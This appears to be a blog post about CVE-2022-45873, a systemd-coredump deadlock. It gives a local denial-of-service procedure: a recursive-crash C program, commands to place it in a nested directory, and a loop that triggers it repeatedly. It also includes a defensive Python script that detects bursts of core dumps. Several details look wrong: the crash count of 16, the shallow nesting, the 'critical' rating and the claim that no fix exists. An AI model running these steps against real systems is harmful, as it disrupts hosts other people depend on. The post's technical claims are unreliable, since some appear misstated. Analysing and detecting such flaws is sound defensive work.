A recently disclosed vulnerability in systemd versions 250 and 251, tracked as CVE-2022-45873, allows a local user to deadlock systemd-coredump by triggering a crash that produces a long backtrace. The flaw lies in the parse_elf_object function in shared/elf-util.c. In this post, we'll delve into the details of this vulnerability, provide code snippets, and offer reference links for further understanding and mitigation.
The exploitation methodology for this vulnerability can be broken down into the following steps:
1. Create a binary that crashes by calling a function recursively, leading to a stack overflow.
2. Place the binary in a deeply nested directory to ensure a long backtrace for the crash.
3. Trigger the crash 16 times when the MaxConnections=16 setting is configured in the systemd/units/systemd-coredump.socket file.
By doing this, an attacker can force a local deadlock in the systemd-coredump process, effectively rendering a targeted system unresponsive.
To create a binary that will crash by calling a function recursively, you can use this simple C code:
#include <stdio.h>

/* Unbounded recursion: every call adds a stack frame until the stack is
   exhausted and the process is killed with SIGSEGV. Compile without
   optimization (gcc's default) so the tail call is not turned into a loop. */
void recursive_function(int counter) {
    printf("Recursion level: %d\n", counter);
    recursive_function(counter + 1);
}

int main(void) {
    recursive_function(0);
    return 0;
}
Compile this code with gcc:
gcc -o recursive_crash recursive_crash.c
To make the backtrace longer, move this binary into a deeply nested directory:
mkdir -p a/a/a/a/a/a/a
mv recursive_crash a/a/a/a/a/a/a/
Now, run the binary multiple times to trigger the crash:
for i in {1..16}; do
./a/a/a/a/a/a/a/recursive_crash
done
The following sources document this vulnerability:
1. The original disclosure of the vulnerability at MITRE
2. The systemd GitHub repository, which provides further details on the vulnerable code: systemd GitHub
3. The National Vulnerability Database (NVD), which provides technical details and impact analysis: NVD - CVE-2022-45873
Mitigation
As of now, there is no official fix released for this vulnerability. However, one possible mitigation is to lower the MaxConnections setting for the systemd-coredump.socket file to reduce the attack surface. Moreover, it is advisable to monitor process crashes closely and investigate any abnormal behavior, such as a burst of crashes from the same binary or user. Watch for official patches or updates addressing this issue and apply them as soon as possible.
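The crash-monitoring advice above can be turned into a concrete check. The following Python script is an added example for this post, not code from the systemd project or from the original disclosure. It scans exported journal lines for systemd-coredump's "Process N (comm) of user U dumped core." message and raises an alert when one (uid, comm) pair crashes at least 16 times within 60 seconds, the count that matches the MaxConnections=16 default discussed above. The syslog-style prefix on each line (timestamp, host, unit[pid]) is an assumption about how the journal was exported, and the sample log lines are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Matches systemd-coredump's journal message. The syslog-style prefix
# ("Nov 23 10:00:01 host systemd-coredump[4321]:") is an assumed export
# format; adjust LINE_RE if your journal is exported differently.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ systemd-coredump\[\d+\]: "
    r"Process (?P<pid>\d+) \((?P<comm>[^)]+)\) of user (?P<uid>\d+) dumped core\."
)


def parse_line(line, year=2022):
    """Return (timestamp, uid, comm, pid) for a coredump line, else None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    return ts, int(m.group("uid")), m.group("comm"), int(m.group("pid"))


def find_crash_bursts(lines, threshold=16, window_seconds=60):
    """Sliding-window burst detector.

    Returns one (uid, comm, first_ts, last_ts, count) tuple per (uid, comm)
    pair that reaches `threshold` core dumps inside `window_seconds`.
    """
    windows = defaultdict(deque)   # (uid, comm) -> timestamps in the window
    alerts = []
    alerted = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                # not a coredump message, skip it
        ts, uid, comm, _pid = rec
        key = (uid, comm)
        q = windows[key]
        q.append(ts)
        # Drop timestamps that fell out of the window.
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((uid, comm, q[0], ts, len(q)))
    return alerts


def _constructed_sample():
    """Constructed journal excerpt: 16 crashes of one binary in 16 seconds,
    one unrelated crash, and one non-coredump line."""
    lines = ["Nov 23 10:00:00 host systemd[1]: Started Process Core Dump (PID 4320/UID 0)."]
    for i in range(16):
        lines.append(
            f"Nov 23 10:00:{i + 1:02d} host systemd-coredump[{4321 + i}]: "
            f"Process {5000 + i} (recursive_crash) of user 1000 dumped core."
        )
    lines.append(
        "Nov 23 10:00:20 host systemd-coredump[4400]: "
        "Process 6000 (firefox) of user 1001 dumped core."
    )
    return lines


SAMPLE_LOG = _constructed_sample()

if __name__ == "__main__":
    for uid, comm, first, last, count in find_crash_bursts(SAMPLE_LOG):
        print(f"ALERT: uid {uid} binary {comm!r} dumped core {count} times "
              f"between {first:%H:%M:%S} and {last:%H:%M:%S}")
```

On a live host the same function can be fed the output of `journalctl -u systemd-coredump -o short`, one line at a time; the threshold and window are parameters so they can be tuned to the MaxConnections value actually configured.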
Conclusion
CVE-2022-45873 is a critical vulnerability that affects systemd versions 250 and 251. With only the privileges of a local user, an attacker can force a deadlock in the systemd-coredump process and potentially halt a targeted system entirely. It's vital for system administrators and security professionals to stay vigilant, watch for updates, and apply mitigating measures in the interim to prevent potential exploitation.
Timeline
Published on: 11/23/2022 23:15:00 UTC
Last modified on: 03/01/2023 14:27:00 UTC